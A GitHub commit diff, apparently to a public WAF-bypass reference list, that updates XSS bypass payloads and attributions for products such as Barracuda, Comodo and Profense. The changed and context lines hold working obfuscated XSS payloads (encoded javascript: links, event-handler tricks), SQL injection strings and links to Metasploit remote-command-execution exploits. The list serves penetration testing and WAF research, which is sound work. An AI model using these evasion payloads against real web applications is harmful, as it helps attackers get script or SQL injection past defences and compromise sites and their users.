Updated many payload with ref.

This commit is contained in:
Infected Drake 2019-04-26 09:41:01 +05:30 committed by GitHub
parent 8651cd47eb
commit c8a9d62cb1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2582,9 +2582,9 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co
Host: favoritewaf.com Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
``` ```
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf) - XSS Bypass by [0xInfection](https://twitter.com/0xInfection)
``` ```
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click <a/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:alert()>clickhere
``` ```
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#) - [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479) - [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
@ -2638,15 +2638,11 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
``` ```
<--`<img/src=` onerror=confirm``> --!> <--`<img/src=` onerror=confirm``> --!>
``` ```
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
```
<a"/onclick=(confirm)()>click
```
### Comodo ### Comodo
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf) - XSS Bypass by [0xInfection](https://twitter.com/0xinfection)
``` ```
<d3v/onauxclick=(((confirm)))``>click <lol/onauxclick=[2].some(confirm)>rightclickhere
``` ```
- SQLi by [@WAFNinja](https://waf.ninja) - SQLi by [@WAFNinja](https://waf.ninja)
``` ```
@ -2696,9 +2692,9 @@ Keep-Alive: 300
<isindex action="javas&tab;cript:alert(1)" type=image> <isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)> <marquee/onstart=confirm(2)>
``` ```
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) - XSS Bypass by [@0xInfection](https://twitter.com/0xinfection)
``` ```
<details/open/ontoggle=(confirm)()// <p draggable=True ondragstart=prompt()>alert
``` ```
- GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741) - GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741)
``` ```
@ -2838,9 +2834,9 @@ stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS
``` ```
?"></script><base%20c%3D=href%3Dhttps:\mysite> ?"></script><base%20c%3D=href%3Dhttps:\mysite>
``` ```
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf) - XSS Bypass by [0xInfection](https://twitter.com/0xInfection)
``` ```
<d3v/onauxclick=[2].some(confirm)>click <abc/onmouseenter=confirm%60%60>
``` ```
### Profense ### Profense
@ -2892,9 +2888,9 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
``` ```
<a href=javas&#99;ript:alert(1)> <a href=javas&#99;ript:alert(1)>
``` ```
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf) - XSS Bypass by [@0xInfection](https://twitter.com/0xInfection)
``` ```
<a/href=javascript&colon;alert()>click <a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At&colon;/**/alert()/**/>click
``` ```
- [HTML Injection](https://www.securityfocus.com/bid/69815/info) by [@Voxel](https://www.exploit-db.com/?author=8505) - [HTML Injection](https://www.securityfocus.com/bid/69815/info) by [@Voxel](https://www.exploit-db.com/?author=8505)
``` ```